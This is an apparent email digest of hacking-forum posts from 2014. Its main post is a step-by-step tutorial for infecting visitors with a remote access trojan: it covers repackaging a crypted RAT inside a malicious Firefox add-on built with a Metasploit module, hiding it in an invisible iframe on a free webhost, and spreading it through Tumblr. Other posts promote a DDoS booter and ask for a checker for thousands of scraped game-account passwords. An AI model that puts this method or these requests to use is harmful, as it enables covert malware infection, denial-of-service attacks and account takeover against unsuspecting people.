Hack Forums - Hacking Tutorials |
- Awesome Hacking Method | Get Tons Of Slaves!
- booter...
- DONT DOWNLOAD TOOLS UNLESS SCANNED BY VIRUSTOTAL.
- Need SUPERFAST mc checker
| Awesome Hacking Method | Get Tons Of Slaves! Posted: 26 Oct 2014 03:15 AM PDT What you need: A RAT (I suggest Bozok free, do not use DarkComet - AV's such as Norton pick up that a file is DarkComet, DarkComet has its own definition in some AV's) A crypter (I suggest LazerCrypter) Firefox Metasploit RAT server Tumblr blog Steps: 1: Open metasploit 2: When metasploit opens enter: use exploit/multi/browser/firefox_xpi_bootstrapped_addon 3: Find your IP via either ifconfig (in linux) or ipconfig (in Windows) 4: Enter the info shown in this picture 5: Go to the URL. Open it in Chrome. The xpi should have downloaded. 6: Go to the xpi archive 7: Open it with an archive program (right click on the file) 9: Click to rename the exe then copy the name of the exe. 10: Delete the exe (Click on it then hit delete) 11: Rename your RAT server the same name as the exe you deleted 12: Add RAT server to the archive by dragging it in. Make sure you have crypted the RAT. In LazerCrypter I would suggest these settings: Done this part :) Now all you need to do is upload the xpi to your webhost where your website is. I suggest creating an account at http://000webhost.com then creating a subdomain, create your main website page (index.html) by clicking new file, then inserting the coding. Make sure somewhere in your coding you have this: <iframe width=0 height =0 frameborder=0 src="linktosubdomainorfulldomain.com/xpiname.xpi> Make sure this is all done in the public_html folder. And then upload the xpi into the public_html folder. When using chrome if somebody goes to your website in Firefox a plugin install prompt will appear. If they install it, your RAT runs on their system and you've infected them. You can also spread via Tumblr by creating a blog and inserting he iframe coding into the Tumblr blogs custom HTML. Now simply post the tumblr blog in a tumblr group and bam! Got repfucked recently for those wondering what is with the negative rep. Check out my threads if you want to know why. |
| Posted: 25 Oct 2014 06:48 PM PDT i dont know if this booter works or not. thought i would list it here to see if any of you guys know about this and see if its legit or not demonstresser.ddns.net i dont know if its legit or not. thanks guys note-i dont know own this, idk if its legit. |
| DONT DOWNLOAD TOOLS UNLESS SCANNED BY VIRUSTOTAL. Posted: 25 Oct 2014 04:08 PM PDT I look at this section at it is FULL of INFECTED tools if you scan it with virustotal.com it comes up with Trojan.Generic32 and Trojan.Dropper and stuff similar to that and people say its a false positive and still getting downloads no sms bomber and stuff like that gives trojans. they always scan with fuckingscan.me and nodistribute.com because virustotal has roughly 52 scanning tools to scan files with and it always says its infected by a trojan. I dont understand why cant virustotal make a downloadable antivirus tool that scans your whole pc with them 52 scanning programs. |
| Posted: 25 Oct 2014 03:53 PM PDT I scraped on every mineplex server and I 23k random password and theres roughly 5k usernames scraped I need a super fast checker and i got the proxy's sorted out but I need a checker ASAP thanks |
| You are subscribed to email updates from Hack Forums - Hacking Tutorials To stop receiving these emails, you may unsubscribe now. | Email delivery powered by Google |
| Google Inc., 1600 Amphitheatre Parkway, Mountain View, CA 94043, United States | |
No comments:
Post a Comment